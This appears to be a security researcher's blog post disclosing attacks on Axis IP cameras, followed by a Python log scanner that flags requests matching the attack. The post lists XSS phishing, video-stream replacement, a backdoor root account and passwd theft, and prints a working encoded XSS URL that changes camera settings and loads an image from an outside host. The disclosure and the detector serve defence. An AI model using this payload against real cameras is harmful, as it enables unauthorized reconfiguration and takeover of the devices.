I’ve done some research on Axis IP cameras, which I am now able to disclose to you, revealing some of the magic. Although this is not independent research, I am mentioning it here as it may interest some.

The research is made up of two components: a purple paper (one of the traditions we follow in GNUCITIZEN) and a video. I promise that I won’t bore you with PoCs, but will show you actual Hollywood-style exploits. This includes the classic attack in which the legitimate video stream gets replaced by another stream that keeps looping forever (remember Speed?). We even created a demo video of this attack! Blame Major Malfunction (soon to be featured) for this, as he suggested the third-party-video infinite loop technique.

Here are some of the juicy bits, mentioned in the paper:

  • Cross-browser XSS phishing
  • Replacing the legitimate video stream with our own
  • Adding a Backdoor Root Account
  • Stealing the ‘passwd’ File

Here is an example of an exploit that we’ve come up with. You don’t know what it is doing? Well… read the paper for more details:

http://target/%3cscript%20src=%22/this_server/ServerManager.sr
v%3fconf_Layout_TitleEnabled=yes&Layout_TitleEnabled=on&conf_L
ayout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3cimg%20src=ht
tp://snipu.com/f1%3e%3c!--
&servermanager_do=set_variables%22%3e%3c/script%3e%3c!--
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA
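
For anyone watching the web logs of such a camera, here is a log-side check for requests shaped like the URL above. It is an added example, not code from the paper or from Axis: the log lines are constructed, the function names are hypothetical, and only `ServerManager.srv` and `servermanager_do=set_variables` are taken from the URL itself.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (addresses and timestamps are made up). Only
# ServerManager.srv and servermanager_do=set_variables come from the URL above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /view/index.shtml HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2008:10:00:07 +0000] "GET /%3cscript%20src=%22/this_server/'
    'ServerManager.srv%3fconf_Layout_TitleEnabled=yes&servermanager_do=set_variables'
    '%22%3e%3c/script%3e%3c!--AAAAAAAA HTTP/1.1" 404 312',
    '192.0.2.10 - - [01/Jan/2008:10:01:12 +0000] "GET /this_server/ServerManager.srv'
    '?servermanager_do=set_variables&conf_Layout_TitleEnabled=yes HTTP/1.1" 200 88',
    '192.0.2.51 - - [01/Jan/2008:10:02:30 +0000] "GET /%253Cimg%2520src=x%253E HTTP/1.1" 404 300',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP_RE = re.compile(r'<\s*/?\s*(?:script|img|iframe|svg)\b|<!--', re.IGNORECASE)
CONFIG_RE = re.compile(r'ServerManager\.srv.*servermanager_do=set_variables', re.IGNORECASE)

def fully_decode(target, max_rounds=3):
    """Percent-decode repeatedly so double-encoded markup is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def classify(line):
    """Return a verdict string for a suspicious request line, else None."""
    match = REQUEST_RE.search(line)
    if match is None:
        return None
    target = fully_decode(match.group(1))
    if not MARKUP_RE.search(target):
        return None  # no markup in the request target: not this pattern
    if CONFIG_RE.search(target):
        return "markup-wrapping-config-change"
    return "markup-in-target"

def scan(lines):
    """Return (client address, verdict) for every flagged line."""
    hits = []
    for line in lines:
        verdict = classify(line)
        if verdict:
            hits.append((line.split()[0], verdict))
    return hits

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

The rule keys on HTML markup in the decoded request target, so a direct request to the settings endpoint (third sample line) is left alone while the wrapped and the double-encoded variants are flagged.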